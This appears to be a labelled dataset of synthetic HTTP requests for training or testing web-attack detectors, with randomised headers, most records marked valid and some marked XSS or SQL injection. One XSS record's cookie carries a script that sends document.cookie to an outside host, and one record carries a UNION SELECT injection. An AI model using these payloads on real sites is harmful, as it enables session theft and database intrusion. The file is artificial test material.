Date: Thu, 02 Dec 04 22:21:47 UTC
ETag: "7wBQ58KJo_lePfJqRvb"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Wed, 09 Jun 04 07:57:41 UTC
If-Unmodified-Since: Fri, 06 Aug 04 17:27:27 UTC
If-Match: "xfyYytJRc1fZgH_6hnyy"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: "J_31UVfYoAzNr615oU"
Max-Forwards: 3976
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic TjBsMjJlOklhc21oc3V3
Authorization: Digest nonce
Range: 5394-,21859-42
Referer: http://www.tn0a4aeJ.cz/olelese/cauetv/ehli/mdoal.asp
TE: gzip;q=0.0
Trailer: Via
User-Agent: sl0eorim (trOg0d0C; nu3w5klKOo)
UA-CPU: Sparc
UA-Disp: 5576,9149,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 831x847
Via: 1.1 www.a8Scopro.gif:52015
Transfer-Encoding: gzip
Upgrade: eai0N0/8.3
Warning: 268 73.155.225.55 "tujat7tN1dsia" "Fri, 08 Oct 04 18:08:34 CET"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 5125463883
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32337
Start - Id: 26746
class: Valid
GET /.vg7K2ceD/nh5XoLogI7hhG/elUvmFsCjKV00/iIldXfIahD.6V/iiWbpcSa1entssaSos/iUJPfTxHjjFNr3/SBRncXautoexecSlT/gnhSolo/Y3homej9sLl.jpg?eittf=sye+stbYo+n1&ee=osskjsR1u&0hr9xvee=567151336&OhgThavingV=+rm&autu=lavatIIeehne+wheree&at=TnvEoobjectoh&elanb=31232 HTTP/1.0
Host: www.0aeciehg.net
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: macintosh;q=0.0, x-mac-roman, windows-1252;q=0.9
Accept-Encoding: gzip;q=0.8, compress;q=0.1, identity;q=0.1, compress;q=0.9, gzip;q=0.1
Accept-Language: o9nin-acteroyv;q=0.1, fea-cseYcdl, sdx-ou
Cache-Control: only-if-cached
Client-ip: 65.249.20.219
Cookie: oh1taaYt1qirR=0998170468;ySo1wXxp_9jshutdownnr=~;9nh=wsng;bPC@5=ePh8PEpE.AoE
Cookie2: $Version="905"
Date: Sat, 21 Mar 09 21:29:24 GMT
ETag: "Dxp4@Qky07BR_FAN"
Expect: SlicjSti
From: ttrelh@st8tsnvenE.cz
If-Modified-Since: Wed, 15 Sep 04 09:58:17 UTC
If-Unmodified-Since: Mon, 17 Sep 07 20:22:29 GMT
If-Match: "YOsjeCo20EjFVyEs"
If-None-Match: *
If-Range: "iNqu7.zPA3gG0@P2"
Max-Forwards: 056
MIME-Version: 1.9
Pragma: 6ugsog='nshmsd'
Proxy-Authorization: trel9e 9e8qd=tce47
Authorization: omvses rBoytsC=xhal
Range: 18782-,79-10,1-29104
Referer: http://caeb.ch/mekxox/occeas6E/9wtA.php4
TE: chunked;q=0.1
Trailer: Range
User-Agent: atc4/5.8.1.5.5
UA-CPU: MIPS
UA-Disp: 1590,7920,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 358x270
Via: 2.1 189.80.107.122
Transfer-Encoding: identity
Upgrade: qoaea/2.1, eoh/5.5, MurT5/6.9, kes/2.1
Warning: 690 159.100.10.222 "ttdrx" 
X-Forwarded-For: 184.128.191.151
X-Serial-Number: 1194043277645
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26746
Start - Id: 886
class: Valid
GET /8f9thc/t6myg42nnGfNi9rtf/go/luitODh/eFenieSiadrnei/terecba4stgmoerudwe/e6xdne/9xel1/gwFOtGfzyxZ_/nNTy0_Ji57hFrJWtRC@0/lxmJ/ie.asmx?itudtiesyx=d02&aiae=hffd8sGkzF.o&d0Cmni2Tob=4580052&TReIHfl4itmrgsd=eon-e&rarn=S&aviamfpRlcsgTei=arcm%2F&LBeinputvbscripts6NFc=m8nsiteh7V9 HTTP/1.0
Host: www.eHhui.cz
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: compress
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 198.140.34.71
Cookie: WCqEMofYh=h;OziTgsESXv=425032028;ymAeeZ0=623;dKQ@=sehefisGhttps&nsrth;l0icelhh=2do/r
Cookie2: $Version="2"
Date: Sat, 27 Mar 10 11:35:43 UTC
ETag: "XSjeLmo19ESb18co3"
Expect: 100-continue
From: Ou2tor@taoe.fr
If-Modified-Since: Thu, 07 Apr 05 24:04:54 GMT
If-Unmodified-Since: Thu, 20 Aug 09 18:44:49 UTC
If-Match: "sF_J__uqiz1HY5ls"
If-None-Match: "NDIVxooGh9RTP8Ix-"
If-Range: Fri, 11 Nov 05 17:53:22 GMT
Max-Forwards: 505
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic ZW5lRGVhOmthbnRuUjJz
Authorization: NTLM dGFhQWhxZWFoYTNhdGVwZDlkd0VPTkVpYW5vaWVyZE5Ec2FhUmk2dmVzNXN3dQ==
Range: 03-,31-18005,845834-77348
Referer: /oqgs0osn/ha9fev.ace
TE: trailers,gzip,chunked
Trailer: Via
User-Agent: Mozilla/1.5 (compatible; MSIE 2.9; WinNT; tololb; tibo; zoiz)
UA-CPU: 68000
UA-Disp: 1675,0086,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 848x029
Via: HTTP/8.4 www.iqsmnd.html, 6l0rm/0.8 120.89.180.152, FTP/4.9 92.205.113.225
Transfer-Encoding: ee9is
Upgrade: qos/8.5, uhncee/1.8, heeaj/4.9, Eng9hD/1.7, teo/3.0
Warning: 739 www.M13tf.tiff "wbiCnlbr1oeamRa0" 
X-Forwarded-For: 168.48.15.93
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 886
Start - Id: 9306
class: Valid
GET /4ahet/ah6bcsss/phvprherdoiewFeionAr/pbefwshreuOee5e/eWD2/Krza/2m2tBdaqkEeo6ysiiD5/cL/ZO9yXbq/ealrc1heu2hyjhm.asmx?Ksmocha.8jA=t&94pnp=i8LQhUPT%40W&lAVn6w11tdi=hitstp&ac3eosneclacd=idtqdocumentCoa%3Bjed&siocSszeErwl=satmidfskze%3A&o1t8D=33135535&suditznArlAso=rire%276lht&reqe=7hNmfef&4hb8yku4oo=augroup+bybd%7CEcatqnyqT&tozmleeedhan=681687572&zdBDsnull7mLftmpe=0589639&SNmk@https=ati&eE6es=etekl%5Dvprr+ysgnHlike&EdWjt41=httptrru0aePU&nDsj8npo=an1Ql HTTP/1.1
Host: www.srpk.com:909
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.1, compress;q=0.6, identity;q=0.5, gzip
Accept-Language: 1tozstT-ei;q=0.8
Cache-Control: max-stale
Client-ip: 61.222.135.185
Cookie: ojf2Cezes=aah;tolmhaLNuk=@rt
Cookie2: $Version="974"
Date: Sun, 18 Jan 09 19:01:46 GMT
ETag: W/"FkAJ4vKKqht86LkE2C"
Expect: 100-continue
From: clbdsbE@ouRcuroAt.it
If-Modified-Since: Fri, 16 Nov 07 05:42:01 CET
If-Unmodified-Since: Sat, 21 Jun 08 21:01:09 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 26 May 04 03:33:36 UTC
Max-Forwards: 8817
MIME-Version: 8.1
Pragma: g=eell
Proxy-Authorization: NTLM aXNyb3RvbXRhbWdtbXJhZWRydXd0WWtldHRodXBhbm15ZWFvemVjcnJoTw==
Authorization: xynxhp kfsgs=adoihs
Range: 53-
Referer: http://Kexe.ch/ehixsn.mdb
TE: chunked,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.0 (Windows; U; Win 9x 7.3; uq-ec; rv:7.0.2) Gecko/33036307
UA-CPU: 68000
UA-Disp: 7621,4110,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x0669
Via: 6.5 62.54.88.217:50727
Transfer-Encoding: okcsgR
Upgrade: u0F/4.5, tzae/8.8, r6d/0.0
Warning: 170 83.104.71.61 "wr0hialdc" 
X-Forwarded-For: 156.126.164.181
X-Serial-Number: 8554851
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 9306
Start - Id: 32549
class: Valid
GET /ou/eihyurEkcvawaaathH9/rQKPcemFTn8cki-/atTi_X6.h/lSpeit9i1toypceee7e/6Meb.shtml?ln=e%29scripta3om HTTP/1.0
Host: 54.204.161.132
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.9
Cache-Control: max-age=6262
Client-ip: 92.6.43.153
Cookie2: $Version="9"
Date: Sun, 27 Dec 09 18:37:56 UTC
ETag: "nTlIlsTV2OCFtbCD"
Expect: cwides=haciam;arym8c5=oii1o6
If-Modified-Since: Sat, 27 May 06 18:32:05 UTC
If-Unmodified-Since: Wed, 16 Feb 05 02:01:32 GMT
If-Match: "tcxrcDc8XIkdhmU"
If-None-Match: "sD_qOvIsuOnQ@ap"
If-Range: Sat, 30 May 09 19:28:40 CET
Proxy-Authorization: Basic aHJPTGl3OnI5cGh0aQ==
Authorization: eqirt SrakPo=sninetl
Range: -2250
Referer: http://e9jwa.net/eetrly/uuAerrso.cgi
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/1.4 (Machintosh; U; PPC 0.2; he-od; rv:6.4.9) Gecko/68068314
Via: 2.3 www.ep8mu.js:6932, lwwi/9.9 www.rit3.shtml, 5.8 www.nshm24s.htm
Transfer-Encoding: deflate
X-Serial-Number: 6346547194291143

null

End - Id: 32549
Start - Id: 3339
class: Valid
GET /owU0@.NDx/nvW/eyleiharinm8tCnsAeLd.jpeg? HTTP/1.0
Host: 167.167.219.39
Connection: ehiye
Accept: */*;q=0.9
Accept-Charset: koi8, hz-gb-2312;q=0.6, windows-1258, windows-1254
Accept-Encoding: deflate, identity;q=0.2, deflate;q=0.2
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 191.114.174.65
Cookie: Zrailctrr6n8is=83832;yFaT=50970;nirRr3J=0029618
Cookie2: $Version="121"
Date: Thu, 21 Sep 06 21:05:07 GMT
ETag: "4nn5m-sEPn0xqpWeZRNN"
Expect: 100-continue
From: rotrm@prr0Uaen9A.net
If-Modified-Since: Fri, 24 Apr 09 01:07:23 CET
If-Unmodified-Since: Sun, 24 Jun 07 08:54:00 UTC
If-Match: "gskR3175Eq0UxUvE"
If-None-Match: *
If-Range: "b0NOlpKoaJ-RfYzD"
Max-Forwards: 3
MIME-Version: 7.7
Pragma: R9atlob=sanihi
Proxy-Authorization: Basic ZXR5YWx1Om5pYThl
Authorization: heefnz lvImr=ibtkger
Range: -757202
Referer: /e7xIt/2voo/eeCeS2z0/MGdsomea/cshmse.asmx
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: rMOia2pse/6.5.8.8.9
UA-CPU: PowerPC
UA-Disp: 2815,9400,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 701x9468
Via: titrnv/9.3 25.140.66.178, FTP/8.6 205.150.49.211:55471, FTP/8.8 147.194.130.238
Transfer-Encoding: compress
Upgrade: eIegdt/9.4, stirq/7.7, npNs0/5.1, o8tb/3.3, lPry/7.4
Warning: 954 85.124.112.27 "oaanni79stgNe" "Thu, 04 Jun 09 09:43:40 GMT"
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 1661019854
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3339
Start - Id: 23589
class: Valid
GET /cUQ/npbwsS@aL/ady2elwttdrrNeap3s/UVQjDhry/aiaowzEsnQhot/Dsrrmor/au2eyede/PQ-document6.png?iyl2l=wQ6EN&jV9PJwJRuR=eo%5C+Ewt HTTP/1.0
Host: 240.230.33.57:3
Connection: close
Accept: text/html, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 21.9.23.72
Cookie: e4r4eetntanr=3isoauc36l
Cookie2: $Version="6"
Date: Sat, 17 Apr 04 07:07:38 CET
ETag: "aOgDK4jWFYT6rxO"
Expect: WFtlEa=s62Apn;bEaareaI=h3edeTeq
From: Aial5osa@Mysrie.uk
If-Modified-Since: Sat, 01 Oct 05 06:00:03 UTC
If-Unmodified-Since: Sun, 09 May 04 14:46:50 CET
If-Match: "LqziIKbFjvdi3WdddHTZ"
If-None-Match: *
If-Range: "i0TEPVzO8MbYm8oPRc"
Max-Forwards: 5633
MIME-Version: 6.3
Pragma: h='eU'
Proxy-Authorization: rXite lhh9o=0huotic
Authorization: leht aepcmv2=dh7t8s
Range: 62145-4,-94,41-
Referer: /ahtciDd/nnidr/w5ygE.gif
TE: trailers,trailers
Trailer: User-Agent
User-Agent: evN499 http://www.e1SEeu.fr
UA-CPU: PowerPC
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 251x222
Via: 8.1 www.tr6ecna.shtml:8
Transfer-Encoding: gzip
Upgrade: oza/2.5
Warning: 942 www.stchto.jpg "wMlilUefo" "Sun, 18 Jun 06 16:19:46 UTC"
X-Forwarded-For: 141.227.170.60
X-Serial-Number: 1009110184973666911
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23589
Start - Id: 2745
class: Valid
GET /o0Tm4K61eN3WWRAY0L/rO_0j/xzfPICOLFts/oZdivDSO_CIFanph-LYn/nrDInls/rueaEnapwGcdd86pEsa/opoubzm7nleinyt/pnio9oigeatuuEooe/erloyvo.shtml?0nyleyvlnOA4n=duO2KqtFA&rnaLea2sjgw=ed%26-d%271yn+&4Q_AreplaceMmUA=0&6nluhbtnemt=olRonnov4kEteo&tctielolcm2=565056407&asceocaym=+ptncxT&thahhevTerranc=io HTTP/1.0
Host: www.tpeits.be:41519
Connection: close
Accept: image/*;q=0.9, text/*;q=0.3
Accept-Charset: windows-1257;q=0.1, x-mac-roman, windows-1250
Accept-Encoding: *;q=0.7
Accept-Language: 8eat-8i;q=0.7
Cache-Control: no-cache
Client-ip: 133.135.129.178
Cookie: o6hooa=744859
Cookie2: $Version="65"
Date: Fri, 01 Apr 05 12:45:45 GMT
ETag: "5QDGS.NV9zzymwcyb"
Expect: u70trk
From: lqlhi@vaenn.fr
If-Modified-Since: Thu, 15 Jan 09 19:31:00 UTC
If-Unmodified-Since: Sun, 18 Nov 07 12:44:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 777
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="ayby"
Range: 8-,-0,6-
Referer: /enaennR/hblb1if/ntrtbE/asttidm.png
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.9 (compatible; 2gplo; Solaris; neh6)
UA-CPU: PowerPC
UA-Disp: 599,0261,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 738x004
Via: FTP/3.1 www.nthbe.html, 1.4 www.7o7coewd.jpg:9, HTTP/9.7 www.ebseOohO.png
Transfer-Encoding: deflate
Upgrade: ltniik/7.5, 1Ntcmo/9.7
Warning: 048 www.yigv.gif "cdtfsiao" "Mon, 13 Oct 08 01:16:56 UTC"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2745
Start - Id: 46671
class: XSS
GET /dgNL/a1zrTvTo.-dI8uljy/Y_V1w.5yk7UEshutdown/n7aktajadRb/ngaK/lH.X4-N/uASpYL0PTxFNw/-cmdlikeiBbinirrwaPx4D.png?kn4Nuorelcvu=ds1%24u HTTP/1.1
Host: 177.131.202.15
Connection: close
Accept: */*
Accept-Charset: macintosh, windows-1254
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 39.185.229.252
Cookie: 1tRU0VJRlrhttps=tf9ois;t4arnisl=<!-- -- --><script >[document.location.replace   ('http://www.ma.com/cgi-bin/ng.cgi'+document.cookie);]</script ><!-- -- -->;D56htacces=eoee
Cookie2: $Version="999"
Date: Mon, 18 Feb 08 08:42:09 CET
ETag: W/"aS4ysHDtPjTBs0ZI8i"
Expect: 100-continue
From: ocwyd@ratoi.ch
If-Modified-Since: Mon, 11 Jul 05 15:47:12 CET
If-Unmodified-Since: Sat, 17 Apr 04 21:11:14 UTC
If-Match: "BEcC10pZ7PeYIrlSBe_"
If-None-Match: "N-DHG1k7fqQs0wZf5"
If-Range: Wed, 31 May 06 20:45:59 GMT
Max-Forwards: 0
MIME-Version: 0.9
Pragma: i=cr
Proxy-Authorization: Digest qop=mdf79hds
Authorization: Basic MmVwem1iOmhyY3Robw==
Range: -3820,-75
Referer: http://dqaanni.st/hpSrw/qlnb.tar
TE: trailers,trailers,chunked;q=0.9
Trailer: Referer
User-Agent: n5Aom/9.2.2.3
UA-CPU: x86
UA-Disp: 598,1386,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 630x4242
Via: 8.5 www.hnoiynru.jpg, HTTP/3.9 211.56.119.252
Transfer-Encoding: compress
Upgrade: iswm/3.5, nos/4.9, nnhOe/3.4, ranwsn/5.0, tsdq/2.7
Warning: 208 www.u7iqtia.jpg "lnKMot8lqelretdXina" "Sat, 17 Apr 10 13:53:16 GMT"
X-Forwarded-For: 138.128.17.43
X-Serial-Number: 19077842196498
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46671
Start - Id: 8189
class: Valid
GET /pEVFu@tHx5xlZMkw/dj_6Fjg9LZCmQemP/tfRLlcknBtlnu.css?ltFalaih3yz=est-l&IIkjrs51detu=g5qetlaOmiloio&M73qkztmpMC=idumu&tn8e=UPetcah&dtaeoeeathsk=8043713 HTTP/1.1
Host: www.tbs17iacne.be
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.2, compress;q=0.2, compress;q=0.0
Accept-Language: a-malodch;q=0.8, 9e6Unly-wieamo;q=0.3, on2jrut-eL37;q=0.8
Cache-Control: min-fresh=47
Client-ip: 110.38.97.95
Cookie: ineeaieta6est=S0;0iitauoei=uastd;e05=663596280;SO9fwservicesetcR=sn5bGqw.SU8Q;H1sMsrtdePind=idn;eeixAheenptni=4965997
Cookie2: $Version="2"
Date: Tue, 15 May 07 05:56:41 CET
ETag: "CJ2FHvY_yVxe4mme"
Expect: cah1n=aakpb9;omly
From: iyfdu@nabsveeOr.de
If-Modified-Since: Wed, 25 Jul 07 16:34:11 CET
If-Unmodified-Since: Thu, 17 Sep 09 24:44:09 UTC
If-Match: *
If-None-Match: *
If-Range: "b8GLjyVIWsFJCdO59"
Max-Forwards: 5
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic cW5kcm5pOmdzaWFn
Authorization: Basic ZWl5U3Q6YXJPd2w=
Range: -635
Referer: /qrtc0r/seritIab/heto.mdb
TE: deflate;q=0.1,trailers
Trailer: Accept-Charset
User-Agent: iQ0_aZCh http://www.0trzf.cz
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1852x378
Via: 7.0 www.gmehjlol.jpg
Transfer-Encoding: deflate
Upgrade: epnli/5.9
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 93.63.20.222
X-Serial-Number: 81045574594520616
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8189
Start - Id: 42316
class: SqlInjection
GET /8sylhTla2b9ereonfs/Tunsaavyi/lg/7nelgs8sterruWer/odrnaoaz2uoepcu9w/bzAfWq-CHXfjbFHPK/mcB/8I/i5ip1ym/rUXXpU3f31K6xq/fuANant7aoetvs7iRcAh/kaQtSvPulink.js?2tt=gre&97anGeta=%27++%29+++UNION+++++ALL+++++SELECT+++++546%2C68%2C3995%2C1501%2C0812+FROM+++++thN9nbaa+++WHERE+%28+%27%27+%3D%27&amwf49iqYHt4=rvletehr&locationaqrbXaBo=dA HTTP/1.0
Host: www.Eb1pgsn.fr:80
Connection: ihtge5t
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 78.196.96.93
Cookie: is2qnrniENrlSl=egrneseattd6rrmayl;QdK@=tntphbk;euIn2MseohiTse=rr7n;LOperl-=l38ZPBwvoc;salmD8ce1tbado=e ws@efyet@Odpasswd
Cookie2: $Version="97"
Date: Thu, 19 Mar 09 24:28:02 CET
ETag: "kDglQyCeNcEXNvF"
Expect: sEeh=gef1
From: h5dt@dgwd.cz
If-Modified-Since: Mon, 25 Apr 05 05:37:00 UTC
If-Unmodified-Since: Mon, 02 Mar 09 19:26:13 GMT
If-Match: *
If-None-Match: "lUwiy4XMBqqwuBzE-9O"
If-Range: Fri, 26 May 06 01:59:13 GMT
Max-Forwards: 6
MIME-Version: 7.7
Pragma: o=t4eeiyl
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: lllo ni4wt=cetnna
Range: 02230-
Referer: /cmwR/oxtru.wmn
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/7.3 (compatible; MSIE 4.5; WinNT; d9Uemu)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4371x6437
Via: 8.4 www.6sxpebn.js
Transfer-Encoding: Txsaen
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42316
Start - Id: 31033
class: Valid
GET /rkb-omB5IDKrG4/eu2.KvP7y0/-LwMscriptaccess_logT7I/ewilrsgmmneasnhNie0/yEC/bastg/aSkqNJ8EG/uieoNz4c.jpg?OMM4havingdjp=7&avsdotiucsiph=o-&ikjvuj0tTteIos=6&lcin3n=125298035&rxednhItainAu9r=elRWUfMHj.g&0ens3xuo=t&SRjvbscriptorT6qbincD=iYPO2U%40nTldv&ii4sstedtarDise=98912026&h2q0aB3UB=762768&YXsleR=4587&eue9ot7as4n=780&mE=e%3Bq+3ehcifrrqw&r2yt=iIeiunionint%26a%29op%3Fi5&ip7cyeetnseo=T%27a%28gth%29replacesPc6nyptv&uwhor=%5Cts8i HTTP/1.0
Host: 205.144.16.3
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, deflate, compress, deflate;q=0.4, deflate
Accept-Language: tHttl4r-ehloc0ph;q=0.7, nsEnnv5u-eee, eeO-nn, aE-dt
Cache-Control: max-age=465
Client-ip: 39.5.59.243
Cookie: ohvD9TI=49;ham2ltxrrep=$e6gercsHn1ucasock_stream1nrm
Cookie2: $Version="5"
Date: Sat, 11 Oct 08 17:10:14 UTC
ETag: W/"Ynue.Kfv7o5n.U6d-R1D"
Expect: dusql=v5tssnad
From: dhorkpeo@necsezdc4.be
If-Modified-Since: Mon, 29 Nov 04 18:18:57 CET
If-Unmodified-Since: Mon, 12 Sep 05 20:24:31 GMT
If-Match: *
If-None-Match: "PufCyM1Fjydvdv5vChN"
If-Range: Mon, 08 Nov 04 06:03:05 CET
Max-Forwards: 23
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM bnQwbXNoNkluMGVsc3dhdmFpZXNucmh5dG9rbGdsYXNodHVv
Authorization: Digest username="eshrre"
Range: -399706,3-
Referer: /tiiMor/snta/ko3aeulO/prno.swf
TE: gzip,gzip;q=0.8,gzip
Trailer: Expect
User-Agent: Mozilla/2.0 (X11; U; Open BSD i586 0.4; jl-Mk; rv:6.0.0) Gecko/60883410
UA-CPU: MIPS
UA-Disp: 3489,226,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0898x5454
Via: inN/5.3 149.81.138.238, FTP/2.3 www.rsferj.jpeg
Transfer-Encoding: identity
Upgrade: Temt/6.3, h4dtg/3.2
Warning: 549 88.129.127.197 "ioEqr1" "Fri, 12 Dec 08 18:53:48 GMT"
X-Forwarded-For: 58.163.47.254
X-Serial-Number: 827318624572609
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 31033
Start - Id: 29768
class: Valid
GET /meunfjbk3w/3bcELIu_6/gOuBwKlsF/em.uiUYQP7A/bSWFL8UC.MEqkYd/l@To3jfI/aaLhmT8/doCwmfn3mo0ers/merssqnarokQgortnx/tmemdneehltdemwrteD.png?seomaGye=jhAe-%25ecn&rwflalr=15&lmocha3DShSAs=servicesiaccept69%28nbgsoundgl%5BlogcbS%25y%28t HTTP/1.1
Host: 105.63.51.250
Connection: keep-alive
Accept: application/zip, text/*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate, compress, compress;q=0.3, gzip;q=0.7
Accept-Language: etfti-ea, r2oanlr-Iacaeuat, o5iO4d-a;q=0.4, Soqiv6cn-6;q=0.1
Cache-Control: sh=Rhut
Client-ip: 175.124.156.50
Cookie: ddtwd=i
Cookie2: $Version="46"
Date: Sat, 24 Feb 07 23:31:36 UTC
ETag: "VBKG2Z0RIf0MTTl"
Expect: 100-continue
From: apnm@hnhwooJMi.gov
If-Modified-Since: Sat, 20 Sep 08 10:27:49 GMT
If-Unmodified-Since: Sun, 23 Jul 06 13:14:03 GMT
If-Match: "pm5d8eme7@rrY-3Nh-oP"
If-None-Match: *
If-Range: Fri, 16 Jan 09 02:02:18 GMT
Max-Forwards: 8
MIME-Version: 0.4
Pragma: Ttatti=20w
Proxy-Authorization: Ugaojh ovcg=gigisa
Authorization: Basic ZXRNb046cm9FY3B6dVo=
Range: -02795
Referer: http://www.ueemz.org/tiii/gpI0lo/ewwrleml/grweo/msw9as.cfm
TE: gzip;q=0.1,trailers
Trailer: Warning
User-Agent: Mozilla/6.6 (Windows; U; WinNT 8.3; a3-1e; rv:4.0.1) Gecko/81497916
UA-CPU: Sparc
UA-Disp: 045,174,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2347x796
Via: 1.7 www.wunr.js, FTP/0.4 41.141.74.60:4167
Transfer-Encoding: gzip
Upgrade: ireass/1.2, atID/3.9, EkugeU/4.8
Warning: 299 www.1d0a.js:3 "oeah" "Wed, 09 Jun 04 20:27:53 GMT"
X-Forwarded-For: 150.107.9.100
X-Serial-Number: 60598731364940051036
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29768
Start - Id: 13450
class: Valid
GET /ayKFLXA_K/yr2T/trra7eom.asp?nc=320575976&7EHEIK9=dcehh2vice0NnW&bs09=c%287orgtPsddic&gvOrIddb0=3582578280&vjoir=eaa&natgn0ffosAriI4=1&lyhcw=2069390624&QAikl1nwchb=nopeno%26391n&rRir=4&mu4uf=xAiyPDoj21&snstj=+nbz14&8o=032282&siwreTau=4p5d0hhIC&enieeHebezstel=2 HTTP/1.0
Host: 88.89.91.219
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987, x-mac-ce, cp-932;q=0.9, euc-kr
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 61.236.0.64
Cookie: iaOcG=197661;sdkt=86;d8kh=90473;hdaz7tgLi=068348880
Cookie2: $Version="193"
Date: Fri, 18 Apr 08 16:39:05 UTC
ETag: W/"xnaDYbZ8R0GKRm.lcO2"
Expect: 100-continue
From: onWi@fbwst.st
If-Modified-Since: Tue, 26 Aug 08 18:58:23 GMT
If-Unmodified-Since: Fri, 14 May 04 03:26:18 UTC
If-Match: *
If-None-Match: "DjRGbv6EWuQj0cny"
If-Range: Fri, 08 May 09 20:33:58 GMT
Max-Forwards: 1
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: dshsfr ockh=4too
Range: -20257
Referer: http://tjlr.ch/eaizn.pdf
TE: trailers,trailers
Trailer: Authorization
User-Agent: mtGZYmpwK http://www.kCtojr.net
UA-CPU: PowerPC
UA-Disp: 710,2643,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9732x9138
Via: HTTP/9.5 121.208.3.126:911, Bd0hsy/8.3 34.214.142.236:11, rIxs/2.1 www.berelx.jpeg
Transfer-Encoding: deflate
Upgrade: gau/6.0
Warning: 231 www.rsit.htm "dIbgtoshqoaaxhmt" "Sun, 20 Jun 04 15:44:58 CET"
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 564796261351412431
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13450
Start - Id: 42627
class: SqlInjection
